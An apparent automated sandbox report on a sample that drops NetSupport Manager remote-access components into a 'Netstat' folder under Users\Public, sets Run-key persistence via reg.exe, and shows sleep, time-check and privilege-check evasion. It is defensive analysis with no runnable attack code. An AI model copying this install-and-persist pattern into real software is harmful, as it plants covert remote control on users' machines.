Source: C:\Users\Public\Netstat\shv.exe Section loaded: pcicl32.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: shfolder.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: pcichek.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: pcicapi.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: mpr.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: version.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: winmm.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: wsock32.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: netapi32.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: wininet.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: msvcr100.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: msvcr100.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: netutils.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: samcli.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: dbghelp.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: dbgcore.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: wtsapi32.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: nsmtrace.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: nslsp.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: devobj.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: msasn1.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: pcihooks.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: textshaping.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: kernel.appcore.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: winsta.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: wbemcomn.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: riched32.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: riched20.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: usp10.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: msls31.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: amsi.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: userenv.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: profapi.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: windows.storage.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: wldp.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: pciinv.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: iertutil.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: firewallapi.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: dnsapi.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: iphlpapi.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: fwbase.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: mswsock.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: sspicli.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: winhttp.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: winnsi.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: urlmon.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: srvcli.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: rasadhlp.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: fwpuclnt.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: pcicl32.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: shfolder.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: pcichek.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: pcicapi.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: mpr.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: version.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: winmm.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: wsock32.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: netapi32.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: wininet.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: msvcr100.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: msvcr100.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: netutils.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: samcli.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: wtsapi32.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: uxtheme.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: nsmtrace.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: nslsp.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: devobj.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: msasn1.dll
Source: C:\Users\Public\Netstat\shv.exe Section loaded: (the preceding twenty modules, pcicl32.dll through msasn1.dll, are loaded again in the same order by each of the remaining three shv.exe instances; the identical entries are not repeated here)
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32 Jump to behavior
Source: C:\Users\Public\Netstat\shv.exe File opened: C:\Windows\SysWOW64\riched32.dll Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: file.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: file.exe Static file information: File size 2283788 > 1048576
Source: C:\Users\user\Desktop\file.exe File opened: C:\Users\Public\Netstat\msvcr100.dll
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: file.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: file.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: msvcr100.i386.pdb source: shv.exe, shv.exe, 00000006.00000002.3996339764.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 00000009.00000002.2165257502.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000B.00000002.2264988650.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000D.00000002.2351625613.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, shv.exe, 0000000E.00000002.2432218131.000000006E4F1000.00000020.00000001.01000000.0000000D.sdmp, msvcr100.dll.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdb source: shv.exe, 00000006.00000002.3996589650.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 00000009.00000002.2166045519.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000B.00000002.2265311157.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000D.00000002.2352005765.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, shv.exe, 0000000E.00000002.2432458267.0000000074A92000.00000002.00000001.01000000.0000000B.sdmp, PCICHEK.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\client32\Release\PCICL32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3995826855.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 00000009.00000002.2164185568.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000B.00000002.2264560820.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000D.00000002.2351279107.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, shv.exe, 0000000E.00000002.2431838757.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, PCICL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Full\pcichek.pdbN source: PCICHEK.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdbL source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\client32\Release\client32.pdb source: shv.exe, 00000006.00000000.2155681384.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000006.00000002.3993652493.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000000.2159146896.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 00000009.00000002.2162511343.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000000.2256622126.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000B.00000002.2263586732.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000000.2347023437.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000D.00000002.2349971528.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000002.2430920852.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe, 0000000E.00000000.2429867736.0000000000AB2000.00000002.00000001.01000000.00000009.sdmp, shv.exe.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\htctl32.pdb source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, shv.exe, 00000006.00000002.3996225028.000000006D200000.00000002.00000001.01000000.0000000E.sdmp, HTCTL32.DLL.0.dr
Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar64\Release\sfxrar.pdb source: file.exe
Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: file.exe, 00000000.00000003.2140610512.00000229E92F7000.00000004.00000020.00020000.00000000.sdmp, TCCTL32.DLL.0.dr
Source: Binary string: E:\nsmsrc\nsm\1210\1210\ctl32\Release\pcicapi.pdb source: shv.exe, 00000006.00000002.3996495464.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 00000009.00000002.2165773946.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000B.00000002.2265179419.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000D.00000002.2351793987.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, shv.exe, 0000000E.00000002.2432366354.0000000070035000.00000002.00000001.01000000.0000000C.sdmp, pcicapi.dll.0.dr
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: file.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11029590 GetTickCount,LoadLibraryA,GetProcAddress,SetLastError,_malloc,GetProcAddress,GetLastError,_free,_malloc,GetProcAddress,GetProcAddress,InternetOpenA,SetLastError,SetLastError,SetLastError,_free,GetProcAddress,SetLastError,GetProcAddress,InternetConnectA,GetProcAddress,SetLastError,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetLastError,GetProcAddress,SetLastError,GetLastError,GetDesktopWindow,GetProcAddress,SetLastError,GetProcAddress,SetLastError,GetProcAddress,SetLastError,FreeLibrary, 6_2_11029590
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Netstat\__tmp_rar_sfx_access_check_6430546
Source: file.exe Static PE information: section name: .didat
Source: file.exe Static PE information: section name: _RDATA
Source: PCICL32.DLL.0.dr Static PE information: section name: .hhshare
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7C5156 push rsi; retf 0_2_00007FF70E7C5157
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7C5166 push rsi; retf 0_2_00007FF70E7C5167
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1116F055 push ecx; ret 6_2_1116F068
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11169F49 push ecx; ret 6_2_11169F5C
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1116F055 push ecx; ret 9_2_1116F068
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11169F49 push ecx; ret 9_2_11169F5C
Source: msvcr100.dll.0.dr Static PE information: section name: .text entropy: 6.909044922675825

Persistence and Installation Behavior

Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Windows\System32\cmd.exe Process created: reg.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Netstat\TCCTL32.DLL
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Netstat\msvcr100.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Netstat\pcicapi.dll
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Netstat\remcmdstub.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Netstat\shv.exe
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Netstat\HTCTL32.DLL
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Netstat\PCICHEK.DLL
Source: C:\Users\user\Desktop\file.exe File created: C:\Users\Public\Netstat\PCICL32.DLL
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_6D1D7030 ctl_open,LoadLibraryA,InitializeCriticalSection,CreateEventA,CreateEventA,CreateEventA,CreateEventA,WSAStartup,_malloc,_memset,_calloc,_malloc,_memset,_malloc,_memset,GetTickCount,CreateThread,SetThreadPriority,GetModuleFileNameA,GetPrivateProfileIntA,GetModuleHandleA,CreateMutexA,timeBeginPeriod, 6_2_6D1D7030
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11127E10 GetMessageA,Sleep,OpenSCManagerA,DispatchMessageA,OpenServiceA,CloseServiceHandle,StartServiceA,GetLastError,CloseServiceHandle,CloseServiceHandle,GetLastError,CloseServiceHandle,GetLastError, 6_2_11127E10
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat
Source: C:\Windows\System32\reg.exe Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Netstat
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary, 6_2_11139090
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows, 6_2_1115B1D0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt, 6_2_11113290
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos, 6_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos, 6_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer, 6_2_110254A0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId, 6_2_110258F0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer, 6_2_11023BA0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId, 6_2_11024280
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11112670 IsIconic,GetTickCount, 6_2_11112670
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA, 6_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA, 6_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId, 6_2_110C0BB0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop, 6_2_1115ADD0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop, 6_2_1115ADD0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1115B1D0 _memset,SendMessageA,SendMessageA,ShowWindow,SendMessageA,IsIconic,IsZoomed,ShowWindow,GetDesktopWindow,TileWindows, 9_2_1115B1D0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11139090 GetCurrentThreadId,IsWindowVisible,IsWindow,IsWindowVisible,IsWindowVisible,GetForegroundWindow,EnableWindow,EnableWindow,EnableWindow,SetForegroundWindow,FindWindowA,IsWindowVisible,IsWindowVisible,IsIconic,GetForegroundWindow,SetForegroundWindow,EnableWindow,GetLastError,GetLastError,GetLastError,GetTickCount,GetTickCount,FreeLibrary, 9_2_11139090
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11113290 IsIconic,GetTickCount,CreateRectRgn,GetClientRect,SetStretchBltMode,CreateRectRgn,GetClipRgn,OffsetRgn,GetRgnBox,SelectClipRgn,StretchBlt,SelectClipRgn,DeleteObject,StretchBlt,StretchBlt,GetWindowOrgEx,StretchBlt,GetKeyState,CreatePen,CreatePen,SelectObject,Polyline,Sleep,SelectObject,Polyline,Sleep,SelectObject,DeleteObject,DeleteObject,BitBlt, 9_2_11113290
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos, 9_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_110CB2B0 GetWindowRect,IsIconic,GetClientRect,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,IsIconic,GetWindowRect,SetWindowPos, 9_2_110CB2B0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_110254A0 SetWindowPos,GetMenu,DrawMenuBar,GetMenu,DeleteMenu,UpdateWindow,IsIconic,SetTimer,KillTimer, 9_2_110254A0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_110258F0 IsIconic,BringWindowToTop,GetCurrentThreadId, 9_2_110258F0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11023BA0 BringWindowToTop,SetWindowPos,SetWindowPos,SetWindowPos,GetWindowLongA,SetWindowLongA,GetDlgItem,EnableWindow,GetMenu,DeleteMenu,DrawMenuBar,SetWindowPos,IsIconic,UpdateWindow,SetTimer,KillTimer, 9_2_11023BA0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11024280 _memset,_strncpy,_memset,_strncpy,IsWindow,IsIconic,BringWindowToTop,GetCurrentThreadId, 9_2_11024280
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_11112670 IsIconic,GetTickCount, 9_2_11112670
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA, 9_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_111229D0 IsIconic,FreeLibrary,IsIconic,InvalidateRect,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA,PostMessageA, 9_2_111229D0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_110C0BB0 IsIconic,ShowWindow,BringWindowToTop,GetCurrentThreadId, 9_2_110C0BB0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop, 9_2_1115ADD0
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_1115ADD0 IsIconic,ShowWindow,BringWindowToTop,IsWindow,IsIconic,ShowWindow,BringWindowToTop, 9_2_1115ADD0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_11143570 GetTickCount,GetModuleFileNameA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 6_2_11143570
Source: C:\Users\user\Desktop\file.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Netstat\shv.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_6D1C91F0 6_2_6D1C91F0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_6D1D4F30 6_2_6D1D4F30
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_110B8200 Sleep,ExitProcess, 6_2_110B8200
Source: C:\Users\Public\Netstat\shv.exe Code function: 9_2_110B8200 Sleep,ExitProcess, 9_2_110B8200
Source: C:\Users\Public\Netstat\shv.exe Window / User API: threadDelayed 938
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\Public\Netstat\TCCTL32.DLL
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\Public\Netstat\remcmdstub.exe
Source: C:\Users\user\Desktop\file.exe Dropped PE file which has not been started: C:\Users\Public\Netstat\HTCTL32.DLL
Source: C:\Users\Public\Netstat\shv.exe Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe Evaded block: after key decision
Source: C:\Users\Public\Netstat\shv.exe Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Netstat\shv.exe Evasive API call chain: GetLocalTime,DecisionNodes
Source: C:\Users\Public\Netstat\shv.exe Check user administrative privileges: GetTokenInformation,DecisionNodes
Source: C:\Users\Public\Netstat\shv.exe API coverage: 6.2 %
Source: C:\Users\Public\Netstat\shv.exe API coverage: 2.6 %
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_6D1D4F30 6_2_6D1D4F30
Source: C:\Users\Public\Netstat\shv.exe TID: 1012 Thread sleep time: -93800s >= -30000s
Source: C:\Users\Public\Netstat\shv.exe WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: C:\Users\Public\Netstat\shv.exe Last function: Thread delayed
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_6D1D3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6D1D3226h 6_2_6D1D3130
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7940BC FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF70E7940BC
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7AB190 EndDialog,SetDlgItemTextW,GetMessageW,IsDialogMessageW,TranslateMessage,DispatchMessageW,EndDialog,GetDlgItem,SendMessageW,SendMessageW,SetFocus,GetLastError,GetLastError,GetTickCount,GetLastError,GetCommandLineW,CreateFileMappingW,MapViewOfFile,ShellExecuteExW,Sleep,UnmapViewOfFile,CloseHandle,SetDlgItemTextW,SetWindowTextW,SetDlgItemTextW,SetWindowTextW,GetDlgItem,GetWindowLongPtrW,SetWindowLongPtrW,SetDlgItemTextW,SendMessageW,SendDlgItemMessageW,GetDlgItem,SendMessageW,GetDlgItem,SetDlgItemTextW,SetDlgItemTextW,DialogBoxParamW,EndDialog,EnableWindow,SendMessageW,SetDlgItemTextW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SendDlgItemMessageW,FindFirstFileW,FindClose,SendDlgItemMessageW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn, 0_2_00007FF70E7AB190
Source: C:\Users\user\Desktop\file.exe Code function: 0_2_00007FF70E7BFCA0 FindFirstFileExA, 0_2_00007FF70E7BFCA0
Source: C:\Users\Public\Netstat\shv.exe Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess, 6_2_1102D330
